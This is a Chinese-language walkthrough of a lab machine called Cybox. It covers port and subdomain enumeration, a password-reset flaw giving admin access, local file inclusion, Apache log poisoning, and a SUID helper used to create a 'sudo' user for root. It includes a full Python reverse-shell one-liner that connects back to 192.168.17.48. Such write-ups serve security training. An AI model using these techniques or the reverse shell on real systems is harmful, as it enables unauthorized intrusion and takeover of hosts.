枚举
确定 IP 地址
使用 nmap 进行探活:
1
2
3
4
|
nmap -sn 10.1.1.0/24
Nmap scan report for 10.1.1.69
Host is up (0.00087s latency).
|
机器 IP 为 10.1.1.69。
端口扫描及服务枚举
进行全 TCP 端口扫描,同时枚举服务和操作系统的信息:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
|
nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.1.1.71
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
25/tcp open smtp syn-ack ttl 63 Postfix smtpd
|_smtp-commands: cybox.Home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=cybox
| Issuer: commonName=cybox
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-10T23:31:36
| Not valid after: 2030-11-08T23:31:36
| MD5: 597f 372b e5a8 d37c 0b02 df9b b844 c7fc
| SHA-1: baab 1a0e b21f b0d1 dfa3 344d cfe6 4596 eeeb 2b53
| -----BEGIN CERTIFICATE-----
| MIICsDCCAZigAwIBAgIJAPemEpSJPIGYMA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV
| BAMMBWN5Ym94MB4XDTIwMTExMDIzMzEzNloXDTMwMTEwODIzMzEzNlowEDEOMAwG
| A1UEAwwFY3lib3gwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCur26I
| g0/5XNlxCRzMhsE+QaCcBvXUiqyH63k9hKLE9fU0/aOK27ndifAuyNxXKrQ8+O3k
| vVialMdL+acQApma4gZJHGFkdvg4IW8NO6qddqzONOuDW95M8mkGg1TjtuSbr8DN
| 51XkXdpyrqnYNRGcCEPUcsaLxXJ2hi5y2eF/NwRM66LO1cDlktJt+BxV5rwoVJPo
| LGcZDACLytNnTX+gQ4mDP8QlufMyuPlahCiXS+qX2ccyOl6o/57APBJHSuzxdN6R
| YbxEOEGChAI/Ti2Ye0ys8YsRwuJEXA+5HJhjsroCWQ+cyE6LJILvIeB+/KrHd6u2
| UwDCuxlzym114ABdAgMBAAGjDTALMAkGA1UdEwQCMAAwDQYJKoZIhvcNAQELBQAD
| ggEBAEIgTyVioUoDSK87vneqsuGiufdoYu73Z37tL0utmiMELwEes7xniUIFu1zg
| 0Y5l/WXbJpzySnsiDiEivdwYWe5+duXgSA/dOdcaercfumoTiZEwxf26emGbRxz9
| UmYBgTfTZ0GB7RYLCH1IB84Uoli2HC517fCUwwCjdM+hoStShzsESUpQTBDqBTFC
| zyzbuCZ4GsEqYkwzHgSU6LDMkXPhwAdo6+KM/0vkj7hfJGi6mSKBuO7wKTqyip+n
| pXPTBHBxqR7V/idE1nANqbgSS6vs244eNb3Ze07d08Q3gG7ZkLzQ6+bsEDzmfjMx
| oKO+c/GYcn4CLfYiUB4NlVw/KaA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
53/tcp closed domain reset ttl 63
80/tcp open http syn-ack ttl 63 Apache httpd 2.2.17 ((Unix) mod_ssl/2.2.17 OpenSSL/0.9.8o DAV/2 PHP/5.2.15)
|_http-favicon: Unknown favicon MD5: 8B6163E0FDACC85E807F80A78F59C03C
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8o DAV/2 PHP/5.2.15
|_http-title: CYBOX
110/tcp open pop3 syn-ack ttl 63 Courier pop3d
|_pop3-capabilities: LOGIN-DELAY(10) IMPLEMENTATION(Courier Mail Server) UIDL USER PIPELINING TOP
143/tcp open imap syn-ack ttl 63 Courier Imapd (released 2011)
|_imap-capabilities: UIDPLUS THREAD=ORDEREDSUBJECT ACL SORT QUOTA CAPABILITY IDLE NAMESPACE IMAP4rev1 completed OK ACL2=UNIONA0001 CHILDREN THREAD=REFERENCES
443/tcp open ssl/https? syn-ack ttl 63
| ssl-cert: Subject: commonName=cybox.company/organizationName=Cybox Company/stateOrProvinceName=New York/countryName=US/organizationalUnitName=Cybox/emailAddress=admin@cybox.company/localityName=New York City
| Issuer: commonName=cybox.company/organizationName=Cybox Company/stateOrProvinceName=New York/countryName=US/organizationalUnitName=Cybox/emailAddress=admin@cybox.company/localityName=New York City
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-14T15:06:32
| Not valid after: 2021-11-14T15:06:32
| MD5: 1308 6ffe 0aa0 d469 6464 2d4d dbab dd48
| SHA-1: 7a0a d33a 9fc1 b469 295b abc6 8157 bf7b 0788 1a93
| -----BEGIN CERTIFICATE-----
| MIIEDTCCAvWgAwIBAgIJANgoERjVeZGaMA0GCSqGSIb3DQEBCwUAMIGcMQswCQYD
| VQQGEwJVUzERMA8GA1UECAwITmV3IFlvcmsxFjAUBgNVBAcMDU5ldyBZb3JrIENp
| dHkxFjAUBgNVBAoMDUN5Ym94IENvbXBhbnkxDjAMBgNVBAsMBUN5Ym94MRYwFAYD
| VQQDDA1jeWJveC5jb21wYW55MSIwIAYJKoZIhvcNAQkBFhNhZG1pbkBjeWJveC5j
| b21wYW55MB4XDTIwMTExNDE1MDYzMloXDTIxMTExNDE1MDYzMlowgZwxCzAJBgNV
| BAYTAlVTMREwDwYDVQQIDAhOZXcgWW9yazEWMBQGA1UEBwwNTmV3IFlvcmsgQ2l0
| eTEWMBQGA1UECgwNQ3lib3ggQ29tcGFueTEOMAwGA1UECwwFQ3lib3gxFjAUBgNV
| BAMMDWN5Ym94LmNvbXBhbnkxIjAgBgkqhkiG9w0BCQEWE2FkbWluQGN5Ym94LmNv
| bXBhbnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCvPtZ4QjR8jiCf
| EenYyF+0zX72cdgQcats/xI1xNChoRLYHWfCvHAtKRWW2ZA6LcneysORaUEX3CLY
| yR+Rbb47g7opbFkcjunYl/cqnij7MjPahhCfaHlmtFTGax/r1ILsQaDdot/E6Roo
| t0bAZtY+BXbGnjTj2GuBIi4G21mG3AE8MUOFwgKjN/Ig1XpCY7K9DMhXRI2q3EJ9
| 4soZcurTHPgO82qZMH6pBJ3fAdpWHKl9mtjXN7K9gdefTcVUrU1ygcFI1jOe6ebo
| 54pCt3w87zYpN/HYgleKnekgmMJaL67OWYsasdMtV1wyPjEfDKy0xsfAlX1Tyj1k
| UU7VQxRBAgMBAAGjUDBOMB0GA1UdDgQWBBThC+vjCQchxqk6u4Gax+vIcTo5pzAf
| BgNVHSMEGDAWgBThC+vjCQchxqk6u4Gax+vIcTo5pzAMBgNVHRMEBTADAQH/MA0G
| CSqGSIb3DQEBCwUAA4IBAQAl8T47VopXOWecFZ8To6dZ5KLccaSIREaLFZBhFRqV
| AgB28SSF67QKb2gNWtPfqLNCThPEFV8tt5/khbZrPBKakvgwv7IoV4X6UoLY6JNz
| y6y8nYDYmVZ2/HnY34urRWtOgmg7pvkwqymr60+QWfnzOoweV961Nddi4QQs4Fpv
| 1TOm22I0AyQxrSxNZ/NrnG80EXq19Vr8w6/1sJTY4Iy1J5HZjO3To+fOfFB7IEd3
| 41cyClnCQK4U07VW7ygJU25polKFA7S8RhglgwMpXoEgr4XQkPViJwrBRVZrowYr
| XYWBRJlhg+T+VU6YY7a8kmYhLJEfAOCorIipjfbZRwwd
|_-----END CERTIFICATE-----
|_ssl-date: 2021-06-26T02:13:35+00:00; -1s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1
|
开放的端口较多,21、25、80、110、143 和 443。
80 端口枚举
主页如下:
页面最下方包含管理员的邮箱 admin@cybox.company,猜测该机器的域名为 cybox.company,同时添加 /etc/hosts。
扫描目录并无发现,转而枚举子域名:
1
2
3
4
5
6
7
|
gobuster vhost -u cybox.company -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
Found: dev.cybox.company (Status: 200) [Size: 209]
Found: webmail.cybox.company (Status: 302) [Size: 0]
Found: monitor.cybox.company (Status: 302) [Size: 0]
Found: register.cybox.company (Status: 200) [Size: 1252]
Found: ftp.cybox.company (Status: 200) [Size: 5295]
|
发现 5 个子域名,逐一添加到 /etc/hosts 进行进一步枚举。
dev.cybox.company
有个 phpinfo 页面,能够获得一些信息如 apache 部署的目录:
webmail.cybox.company
Squirrel mail,暂时没有凭据。
monitor.cybox.company
又一个登录页面且可以注册:
register.cybox.company
貌似是用来注册用户的:
ftp.cybox.company
网页端的 ftp 和 ssh 客户端:
Initial Shell
先尝试所有能注册用户的页面,register 页面注册用户之后,即可登录 Squirrel mail。monitor 页面注册之后,似乎什么也干不了:
就在一筹莫展之际,留意到 monitor 页面有忘记密码的选项,填入 register 页面注册的账户对应的邮箱,果然收到了邮件:
观察到邮箱存在于 URL 参数中且只有邮箱这个参数,修改成 admin@cybox.company,打开页面,重置,登录成功,页面果然和普通注册的不同,查看源码:
留意到 style.php 一行,很可能为 LFI,简单测试果不其然,简单使用 %00 截断即可:
然后思路就是日志投毒了,利用之前的 phpinfo 页面中获取到 apache 的路径为 /opt/bitnami/apache2/,经过一番试探,apache 的访问日志可以被访问,路径为:/opt/bitnami/apache2/logs/access_log。
这个 apache 对应的是 ftp.cybox.company,access.log 中的资源基本与 页面一致:
然后进行投毒,最后发现将 PHP 语句放在 User-Agent 位置处即可:
写入一句话,成功执行命令:
发现机器上有 python,利用 python 反弹 shell,命令如下:
1
|
python+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.17.48",443));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
获取到 Initial Shell:
提权
在机器上寻找具有 SUID 权限的程序:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
find / -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/at
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/opt/registerlauncher
/bin/mount
/bin/ping
/bin/fusermount
/bin/umount
/bin/ping6
/bin/su
/bin/ntfs-3g
|
下载 /opt/registerlauncher,查看其逻辑:
其只是简单调用 /opt/register,逻辑为创建一个给定用户名的用户,属组与用户同名,且不能与已存在的用户同名。机器上不存在用户 sudo,这里便创建 sudo 用户,提权至 root:
